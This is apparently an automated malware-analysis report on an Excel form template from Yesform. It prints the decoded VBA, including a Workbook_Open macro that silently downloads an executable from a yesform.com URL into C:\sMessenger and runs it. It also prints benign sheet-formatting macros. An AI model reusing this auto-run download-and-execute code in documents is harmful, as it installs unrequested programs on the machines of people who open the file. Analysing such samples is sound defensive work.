Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The Workbook_Open macro in the VBA script executes a Shell command to download and run a second-stage executable from the URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc. This executable is saved to C:\sMessenger\searchMessenger_upgrade_x.exe. The macro also attempts to create the directory C:\sMessenger if it does not exist. The presence of the Shell() call together with the download functionality strongly indicates downloader or dropper malware.
Heuristics (6)
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.yesform.com/active/searchMessenger/dw.php?mode=etc (in document text, OLE body)
  - http://www.yesform.com/z_n/forms/search.php?q= (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10166 bytes |

SHA-256 of macros.bas: 40c06ee803d83c9f072d0c1085c78a1325cf7289ebaf22456eea5e76dfb0c92f
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
End If
End Sub
Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
Set FS = CreateObject("Scripting.FileSystemObject")
oXMLHTTP.Open "GET", SLocalFile, False
oXMLHTTP.send
Do While oXMLHTTP.ReadyState <> 4
DoEvents
Loop
oResp = oXMLHTTP.responsebody
If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"
DFile = FreeFile
If Dir(DLocalFile) <> "" Then Kill DLocalFile
Open DLocalFile For Binary As #DFile
Put #DFile, , oResp
Close #DFile
Set oXMLHTTP = Nothing
Set FS = Nothing
End Function
Attribute VB_Name = "Module1"
Public Const Banner As String = "국내최대 문서서식 예스폼 (www.yesform.com)"
Sub Move_Sheet1()
Sheet1.Activate
End Sub
Sub Move_Sheet2()
Sheet2.Activate
End Sub
Sub Move_Sheet4()
Sheet4.Activate
End Sub
Sub Move_Sheet5()
Sheet5.Activate
End Sub
Sub Move_Sheet6()
Sheet6.Activate
End Sub
Sub 시트보호()
Call Sheet_protect
MsgBox "시트보호모드로 전환되었습니다.", vbInformation, Banner
End Sub
Sub 시트해제()
Dim Result As Integer
Result = MsgBox("본 컨텐츠는 시트보호모드에서 정상적으로 사용할 수 있도록 구성되었습니다." & Chr(13) & "보호 해제 후 임의 수정에 따라 발생하는 컨텐츠 오류 및 손상에 대하여 예스폼(Yesform)이 책임지지 않음을 알려드립니다." & Chr(13) & "시트보호모드를 해제하시겠습니까?", vbYesNo, Banner)
If Result = vbYes Then
Call Sheet_unprotect
Else
Exit Sub
End If
End Sub
Sub P_preview()
ActiveSheet.PrintPreview
End Sub
Sub P_out()
ActiveSheet.PrintOut
End Sub
Sub Sheet_protect()
ActiveSheet.Protect Password = 1234, DrawingObjects:=True, Contents:=True, Scenarios:=True _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True, AllowInsertingHyperlinks:=True, AllowSorting:= _
True, AllowFiltering:=True
End Sub
Sub Sheet_unprotect()
ActiveSheet.Unprotect Password = 1234
End Sub
Sub RowCol()
If ActiveSheet.CheckBoxes("Check Box 1").Value = 1 Then
ActiveWindow.DisplayHeadings = True
Else
ActiveWindow.DisplayHeadings = False
End If
End Sub
Sub Approval_3()
Dim RngA(6) As Range
Dim Combo As DropDown
Set RngA(1) = ActiveSheet.[b4] 'start
Set RngA(2) = ActiveSheet.[aj5] 'end
Set RngA(3) = ActiveSheet.[ag4] 'start of box 1
Set RngA(4) = ActiveSheet.[ac4] 'start of box 2
Set RngA(5) = ActiveSheet.[y4] 'start of box 3
Set RngA(6) = ActiveSheet.[u4] 'start of box 4
Application.ScreenUpdating = False
Application.DisplayAlerts = False 'suppress warning prompts
Call Sheet_unprotect
Range(RngA(1), RngA(2)).MergeCells = False
With Range(RngA(6), RngA(2))
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlCenter
.Font.Bold = True
.Font.Size = 9
.Font.Name = "굴림체"
End With
Set Combo = ActiveSheet.DropDowns(1)
Application.ScreenUpdating = False
Select Case Combo.ListIndex
Case 1 'no approval boxes
Range(RngA(1), RngA(2)).MergeCells = True
Case 2 'one approval box
Range(RngA(1), RngA(3).Offset(1, -1)).MergeCells = True 'merge the area in front (before the approval box)
Range(RngA(3), RngA(3).Offset(0, 3)).MergeCells = True 'merge above the first approval box
Range(RngA(3).Offset(1), RngA(2)).MergeCells = True 'merge below the first approval box
Case 3 'two approval boxes
Range(RngA(1)
... (truncated)
```